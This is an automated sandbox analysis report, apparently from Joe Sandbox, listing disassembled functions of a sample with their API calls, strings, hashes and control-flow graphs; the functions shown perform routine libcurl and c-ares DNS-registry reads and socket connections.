                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 2f5eb22ba8203d881c0ef5644e5cee3259a25fadf2173da44d3b44955048e9ae
                                                            • Instruction ID: 7ef8f6ca0c3a8dd18dc8447bd6de8966512e377d3ef944b18575df58220142eb
                                                            • Opcode Fuzzy Hash: 2f5eb22ba8203d881c0ef5644e5cee3259a25fadf2173da44d3b44955048e9ae
                                                            • Instruction Fuzzy Hash: BA3182B4909319DFCB10EFB8C58469EBBF0AF54748F00896DE899A7240E7749A44CF92
                                                            Function 00DFA440 Relevance: 50.1, APIs: 20, Strings: 8, Instructions: 1066registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00DFA499
                                                            • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00DFA4FB
                                                            • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00DFA531
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00DFAA19
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00DFAA4C
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00DFAA97
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00DFAAE9
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00DFAB30
                                                            • RegCloseKey.KERNELBASE(?), ref: 00DFAB6A
                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00DFAB82
                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00DFAC46
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00DFAD0A
                                                            • RegEnumKeyExA.KERNELBASE ref: 00DFAD8D
                                                            • RegCloseKey.KERNELBASE(?), ref: 00DFADD9
                                                            • RegEnumKeyExA.KERNELBASE ref: 00DFAE08
                                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00DFAE2A
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00DFAE54
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00DFAF63
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00DFAFB2
                                                            • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00DFB072
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                                            • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                            • API String ID: 4281207131-1047472027
                                                            • Opcode ID: 30ec499e3eb3753cdfbac182721dae70082427344c88a5fc14d30572154d49a9
                                                            • Instruction ID: 39f612e2c492a1d61c51192869b1d58c9df841c9f1a16fae89583f532cda2a18
                                                            • Opcode Fuzzy Hash: 30ec499e3eb3753cdfbac182721dae70082427344c88a5fc14d30572154d49a9
                                                            • Instruction Fuzzy Hash: 4972D3B1604305ABE320DF24DC81B6B77E8AF95740F19982CFA89D7291E774E944CB63
                                                            Function 00D7A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00D7A832
                                                            Strings
                                                            • Trying [%s]:%d..., xrefs: 00D7A689
                                                            • cf_socket_open() -> %d, fd=%d, xrefs: 00D7A796
                                                            • Local port: %hu, xrefs: 00D7AF28
                                                            • cf-socket.c, xrefs: 00D7A5CD, 00D7A735
                                                            • Couldn't bind to '%s' with errno %d: %s, xrefs: 00D7AE1F
                                                            • bind failed with errno %d: %s, xrefs: 00D7B080
                                                            • Local Interface %s is ip %s using address family %i, xrefs: 00D7AE60
                                                            • Name '%s' family %i resolved to '%s' family %i, xrefs: 00D7ADAC
                                                            • Trying %s:%d..., xrefs: 00D7A7C2, 00D7A7DE
                                                            • Could not set TCP_NODELAY: %s, xrefs: 00D7A871
                                                            • @, xrefs: 00D7AC42
                                                            • Bind to local port %d failed, trying next, xrefs: 00D7AFE5
                                                            • @, xrefs: 00D7A8F4
                                                            • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00D7A6CE
                                                            • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00D7AD0A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: setsockopt
                                                            • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                            • API String ID: 3981526788-2373386790
                                                            • Opcode ID: 837c822e0ac44b1a1fe7092571a9581d732a4eac0588316a8b9f9f8fc148a82a
                                                            • Instruction ID: 6b7707928aa4e67279a1d3a73a77199aa609fbbdcd53dae0b0a1d2f2da3776af
                                                            • Opcode Fuzzy Hash: 837c822e0ac44b1a1fe7092571a9581d732a4eac0588316a8b9f9f8fc148a82a
                                                            • Instruction Fuzzy Hash: F762C171508341ABE7258F18C846BABB7E5EFC1314F08891DF98C97292F771A945CBA3
                                                            Function 00E09740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 505 e09740-e0975b 506 e09780-e09782 505->506 507 e0975d-e09768 call e078a0 505->507 509 e09914-e0994e call 10c8b70 RegOpenKeyExA 506->509 510 e09788-e097a0 call 10c8e00 call e078a0 506->510 515 e099bb-e099c0 507->515 516 e0976e-e09770 507->516 518 e09950-e09955 509->518 519 e0995a-e09992 RegQueryValueExA RegCloseKey call 10c8b98 509->519 510->515 521 e097a6-e097c5 510->521 522 e09a0c-e09a15 515->522 520 e09772-e0977e 516->520 516->521 518->522 533 e09997-e099b5 call e078a0 519->533 520->510 528 e09827-e09833 521->528 529 e097c7-e097e0 521->529 534 e09835-e0985c call dfe2b0 * 2 528->534 535 e0985f-e09872 call e05ca0 528->535 531 e097e2-e097f3 call 10c8b50 529->531 532 e097f6-e09809 529->532 531->532 532->528 545 e0980b-e09810 532->545 533->515 533->521 534->535 546 e099f0 535->546 547 e09878-e0987d call e077b0 535->547 545->528 550 e09812-e09822 545->550 549 e099f5-e099fb call e05d00 546->549 554 e09882-e09889 547->554 559 e099fe-e09a09 549->559 550->522 554->549 558 e0988f-e0989b call df4fe0 554->558 558->546 563 e098a1-e098c3 call 10c8b50 call e078a0 558->563 559->522 569 e099c2-e099ed call dfe2b0 * 2 563->569 570 e098c9-e098db call dfe2d0 563->570 569->546 570->569 574 e098e1-e098f0 call dfe2d0 570->574 574->569 581 e098f6-e09905 call e063f0 574->581 585 e09f66-e09f7f call e05d00 581->585 586 e0990b-e0990f 581->586 585->559 587 e09a3f-e09a5a call e06740 call e063f0 586->587 587->585 594 e09a60-e09a6e call e06d60 587->594 597 e09a70-e09a94 call e06200 call e067e0 call e06320 594->597 598 e09a1f-e09a39 call e06840 call e063f0 594->598 609 e09a16-e09a19 597->609 610 e09a96-e09ac6 call dfd120 597->610 598->585 598->587 609->598 612 e09fc1 609->612 615 e09ae1-e09af7 call dfd190 610->615 616 e09ac8-e09adb call dfd120 610->616 614 e09fc5-e09ffd call e05d00 call dfe2b0 * 2 612->614 614->559 615->598 624 e09afd-e09b09 call df4fe0 615->624 616->598 616->615 624->612 630 e09b0f-e09b29 call dfe730 624->630 634 e09f84-e09f88 630->634 635 e09b2f-e09b3a call e078a0 630->635 638 e09f95-e09f99 634->638 635->634 642 e09b40-e09b54 call dfe760 635->642 640 e09fa0-e09fb6 call dfebf0 * 2 638->640 641 e09f9b-e09f9e 638->641 652 e09fb7-e09fbe 640->652 641->612 641->640 648 e09f8a-e09f92 642->648 649 e09b5a-e09b6e call dfe730 642->649 648->638 655 e09b70-e0a004 649->655 656 e09b8c-e09b97 call e063f0 649->656 652->612 661 e0a015-e0a01d 655->661 662 e09c9a-e09cab call dfea00 656->662 663 e09b9d-e09bbf call e06740 call e063f0 656->663 664 e0a024-e0a045 call dfebf0 * 2 661->664 665 e0a01f-e0a022 661->665 674 e09f31-e09f35 662->674 675 e09cb1-e09ccd call dfea00 call dfe960 662->675 663->662 682 e09bc5-e09bda call e06d60 663->682 664->614 665->614 665->664 677 e09f40-e09f61 call dfebf0 * 2 674->677 678 e09f37-e09f3a 674->678 693 e09cfd-e09d0e call dfe960 675->693 694 e09ccf 675->694 677->598 678->598 678->677 682->662 692 e09be0-e09bf4 call e06200 call e067e0 682->692 692->662 713 e09bfa-e09c0b call e06320 692->713 703 e09d10 693->703 704 e09d53-e09d55 693->704 695 e09cd1-e09cec call dfe9f0 call dfe4a0 694->695 714 e09d47-e09d51 695->714 715 e09cee-e09cfb call dfe9d0 695->715 708 e09d12-e09d2d call dfe9f0 call dfe4a0 703->708 707 e09e69-e09e8e call dfea40 call dfe440 704->707 733 e09e90-e09e92 707->733 734 e09e94-e09eaa call dfe3c0 707->734 730 e09d5a-e09d6f call dfe960 708->730 731 e09d2f-e09d3c call dfe9d0 708->731 725 e09c11-e09c1c call e07b70 713->725 726 e09b75-e09b86 call dfea00 713->726 720 e09dca-e09ddb call dfe960 714->720 715->693 715->695 743 e09ddd-e09ddf 720->743 744 e09e2e-e09e36 720->744 725->656 747 e09c22-e09c33 call dfe960 725->747 726->656 752 e09f2d 726->752 758 e09d71-e09d73 730->758 759 e09dc2 730->759 731->708 755 e09d3e-e09d42 731->755 740 e09eb3-e09ec4 call dfe9c0 733->740 762 e09eb0-e09eb1 734->762 763 e0a04a-e0a04c 734->763 740->598 765 e09eca-e09ed0 740->765 753 e09e06-e09e21 call dfe9f0 call dfe4a0 743->753 749 e09e38-e09e3b 744->749 750 e09e3d-e09e5b call dfebf0 * 2 744->750 774 e09c35 747->774 775 e09c66-e09c75 call e078a0 747->775 749->750 760 e09e5e-e09e67 749->760 750->760 752->674 789 e09de1-e09dee call dfec80 753->789 790 e09e23-e09e2c call dfeac0 753->790 755->707 770 e09d9a-e09db5 call dfe9f0 call dfe4a0 758->770 759->720 760->707 760->740 762->740 768 e0a057-e0a070 call dfebf0 * 2 763->768 769 e0a04e-e0a051 763->769 773 e09ee5-e09ef2 call dfe9f0 765->773 768->652 769->612 769->768 803 e09d75-e09d82 call dfec80 770->803 804 e09db7-e09dc0 call dfeac0 770->804 773->598 796 e09ef8-e09f0e call dfe440 773->796 782 e09c37-e09c51 call dfe9f0 774->782 792 e0a011 775->792 793 e09c7b-e09c8f call dfe7c0 775->793 782->656 819 e09c57-e09c64 call dfe9d0 782->819 807 e09df1-e09e04 call dfe960 789->807 790->807 792->661 793->656 814 e09c95-e0a00e 793->814 817 e09f10-e09f26 call dfe3c0 796->817 818 e09ed2-e09edf call dfe9e0 796->818 823 e09d85-e09d98 call dfe960 803->823 804->823 807->744 807->753 814->792 817->818 831 e09f28 817->831 818->598 818->773 819->775 819->782 823->759 823->770 831->612
                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00E09946
                                                            • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00E09974
                                                            • RegCloseKey.KERNELBASE(?), ref: 00E0998B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                            • API String ID: 3677997916-4129964100
                                                            • Opcode ID: 563c12b586af14dbf32a52b4f5318bb8aaeec9e360efb8f667d54bfa417545c5
                                                            • Instruction ID: e039b9fa26b4bb13c5816616ce2453128beca0a600bb8497feebfce1cbaaac62
                                                            • Opcode Fuzzy Hash: 563c12b586af14dbf32a52b4f5318bb8aaeec9e360efb8f667d54bfa417545c5
                                                            • Instruction Fuzzy Hash: E632B8B59042016BE711AF20EC42A2B77D5AF54318F095834F949A72A3F731ED54C7B3
                                                            Function 00D78B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 945 d78b50-d78b69 946 d78be6 945->946 947 d78b6b-d78b74 945->947 948 d78be9 946->948 949 d78b76-d78b8d 947->949 950 d78beb-d78bf2 947->950 948->950 951 d78bf3-d78bfe call d7a550 949->951 952 d78b8f-d78ba7 call d56e40 949->952 959 d78de4-d78def 951->959 960 d78c04-d78c08 951->960 957 d78bad-d78baf 952->957 958 d78cd9-d78d16 SleepEx getsockopt 952->958 961 d78ca6-d78cb0 957->961 962 d78bb5-d78bb9 957->962 963 d78d22 958->963 964 d78d18-d78d20 958->964 965 d78df5-d78e19 call d7a150 959->965 966 d78e8c-d78e95 959->966 967 d78c0e-d78c1d 960->967 968 d78dbd-d78dc3 960->968 961->958 969 d78cb2-d78cb8 961->969 962->950 970 d78bbb-d78bc2 962->970 971 d78d26-d78d39 963->971 964->971 1001 d78e1b-d78e26 965->1001 1002 d78e88 965->1002 972 d78e97-d78e9c 966->972 973 d78f00-d78f06 966->973 975 d78c35-d78c48 call d7a150 967->975 976 d78c1f-d78c34 connect 967->976 968->948 978 d78cbe-d78cd4 call d7b180 969->978 979 d78ddc-d78dde 969->979 970->950 980 d78bc4-d78bcc 970->980 982 d78d43-d78d61 call d5d8c0 call d7a150 971->982 983 d78d3b-d78d3d 971->983 984 d78edf-d78eef call d478b0 972->984 985 d78e9e-d78eb6 call d52a00 972->985 973->950 1003 d78c4d-d78c4f 975->1003 976->975 978->959 979->948 979->959 988 d78bd4-d78bda 980->988 989 d78bce-d78bd2 980->989 1013 d78d66-d78d74 982->1013 983->979 983->982 1005 d78ef2-d78efc 984->1005 985->984 1000 d78eb8-d78edd call d53410 * 2 985->1000 988->950 996 d78bdc-d78be1 988->996 989->950 989->988 1004 d78dac-d78db8 call d850a0 996->1004 1000->1005 1008 d78e2e-d78e85 call d5d090 call d84fd0 1001->1008 1009 d78e28-d78e2c 1001->1009 1002->966 1010 d78c51-d78c58 1003->1010 1011 d78c8e-d78c93 1003->1011 1004->950 1005->973 1008->1002 1009->1002 1009->1008 1010->1011 1017 d78c5a-d78c62 1010->1017 1019 d78c99-d78c9f 1011->1019 1020 d78dc8-d78dd9 call d7b100 1011->1020 1013->950 1014 d78d7a-d78d81 1013->1014 1014->950 1021 d78d87-d78d8f 1014->1021 1023 d78c64-d78c68 1017->1023 1024 d78c6a-d78c70 1017->1024 1019->961 1020->979 1026 d78d91-d78d95 1021->1026 1027 d78d9b-d78da1 1021->1027 1023->1011 1023->1024 1024->1011 1030 d78c72-d78c8b call d850a0 1024->1030 1026->950 1026->1027 1027->950 1032 d78da7 1027->1032 1030->1011 1032->1004
                                                            APIs
                                                            • connect.WS2_32(?,?,00000001), ref: 00D78C2F
                                                            • SleepEx.KERNELBASE(00000000,00000000), ref: 00D78CF3
                                                            • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00D78D0E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: Sleepconnectgetsockopt
                                                            • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                            • API String ID: 1669343778-879669977
                                                            • Opcode ID: bcdaeb1ea2ea424d7e8300c9992e0c41834f7b1d19509e7b6ad2f4b5ba5395da
                                                            • Instruction ID: 87fc1c33eeceb74b51ed213b3395477b86ec2109fb7e2dab76b8065495f6fa4f
                                                            • Opcode Fuzzy Hash: bcdaeb1ea2ea424d7e8300c9992e0c41834f7b1d19509e7b6ad2f4b5ba5395da
                                                            • Instruction Fuzzy Hash: 52B19E70644705AFDB20CF24C889BA6B7A0AF55314F18C62DEC9D5B292EB71EC48D772
                                                            Function 00D42F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1132 d42f17-d42f8c call 11c98f0 call 11c9ce0 1137 d431c9-d431cd 1132->1137 1138 d42f91-d42ff4 call d41619 RegOpenKeyExA 1137->1138 1139 d431d3-d431d6 1137->1139 1142 d431c5 1138->1142 1143 d42ffa-d4300b 1138->1143 1142->1137 1144 d4315c-d431ac RegEnumKeyExA 1143->1144 1145 d43010-d43083 call d41619 RegOpenKeyExA 1144->1145 1146 d431b2-d431c2 RegCloseKey 1144->1146 1149 d4314e-d43152 1145->1149 1150 d43089-d430d4 RegQueryValueExA 1145->1150 1146->1142 1149->1144 1151 d430d6-d43137 call 11c9bc0 call 11c9c50 call 11c9ce0 call 11c9af0 call 11c9ce0 call 11c8050 1150->1151 1152 d4313b-d4314b RegCloseKey 1150->1152 1151->1152 1152->1149
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: CloseEnumOpen
                                                            • String ID: d
                                                            • API String ID: 1332880857-2564639436
                                                            • Opcode ID: 4353c058c72a83236056d9cfdb34573ce8125c7af8169bf9953986bcceeca37f
                                                            • Instruction ID: d4b87d874e48494e1804b10a05532045fdbedf04b686773cb2a636ad8c48b212
                                                            • Opcode Fuzzy Hash: 4353c058c72a83236056d9cfdb34573ce8125c7af8169bf9953986bcceeca37f
                                                            • Instruction Fuzzy Hash: 767180B490431A9FDB14DF69C98479EBBF0BF84308F10896DE99897300D7749A88CF92
                                                            Function 00D79290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1165 d79290-d792ed call d476a0 1168 d793c3-d793ce 1165->1168 1169 d792f3-d792fb 1165->1169 1178 d793e5-d79427 call d5d090 call d84f40 1168->1178 1179 d793d0-d793e1 1168->1179 1170 d79301-d79333 call d5d8c0 call d5d9a0 1169->1170 1171 d793aa-d793af 1169->1171 1191 d793a7 1170->1191 1192 d79335-d79364 WSAIoctl 1170->1192 1172 d79456-d79470 1171->1172 1173 d793b5-d793bc 1171->1173 1176 d793be 1173->1176 1177 d79429-d79431 1173->1177 1176->1172 1181 d79433-d79437 1177->1181 1182 d79439-d7943f 1177->1182 1178->1172 1178->1177 1179->1173 1183 d793e3 1179->1183 1181->1172 1181->1182 1182->1172 1186 d79441-d79453 call d850a0 1182->1186 1183->1172 1186->1172 1191->1171 1193 d79366-d7936f 1192->1193 1194 d7939b-d793a4 1192->1194 1193->1194 1197 d79371-d79390 setsockopt 1193->1197 1194->1191 1197->1194 1198 d79392-d79395 1197->1198 1198->1194
                                                            APIs
                                                            • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00D7935C
                                                            • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00D79389
                                                            Strings
                                                            Memory Dump Source
